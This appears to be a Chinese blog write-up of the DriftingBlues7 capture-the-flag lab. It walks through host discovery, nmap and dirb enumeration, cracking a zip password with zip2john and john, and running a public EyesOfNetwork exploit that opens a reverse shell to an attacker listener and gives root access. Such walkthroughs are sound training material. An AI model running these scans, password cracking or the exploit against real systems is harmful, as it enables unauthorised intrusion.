Driftingblues7靶场笔记
apl
首先配置靶机,可以设置为桥接模式,通过MAC地址去发现IP
Found
arp 172.16.10.0/24
或 netdiscover -i 172.16.10.0/24
利用nmap进行第一步扫描,查看开放端口
首先进行开放端口 nmap -n -sS -p- 172.16.10.184
扫描靶机详细信息,进一步扫描
nmap -p- -sC -sV --min-rate=1000 172.16.10.184
Dirb
通过上一步信息收集,发现开放66端口为python服务器
利用dirb进行对靶机66端口进行目录枚举
apl
dirb http://172.16.10.184:66 -X .html .txt .bak /usr/share/wordlists/dirb/*
发现了第一个特殊的txt文件,将其下载下来查看,发现查看到flag
将.bash_history也下载下来查看
wget http://172.16.10.184:66/.bash_history
这结束了吗?我不这么认为,因为从bash历史文件可以看出,该机器的作者已经从另一台计算机复制了根标志并重命名了它
继续进行收集,更换字典/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt,这里需要花费挺长的时间,最后发现eon目录,进行下载
发现是一个base64文件,进行查看还是存在乱码
经过查看,发现是PK头,猜测是一个zip文件
利用一个在线网址破解:https://base64.guru/converter/decode/file
john
通过上一步将zip文件下载下来,发现为加密文件,利用zipjohn进行破解
apl
zcat /usr/share/wordlists/rockyou.txt.gz > zidian.txt
zip2john application.zip | tee hash (输出到hash文件)
john --wordlist=zidian.txt hash
infiltration
网络之眼的版本似乎有一个漏洞,进行查阅和测试
https://www.exploit-db.com/exploits/48025.因此,我决定在我的工作目录中复制该漏洞并运行它
利用kali进行搜集存在EyesOfNetwork漏洞
发现可利用漏洞文件48025.txt
利用此exploit脚本进行漏洞利用,成功getshell
python3 exploit.py https://172.16.10.184 -ip 172.16.10.200 -port 3333
成功利用root身份获得了最终的flag
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论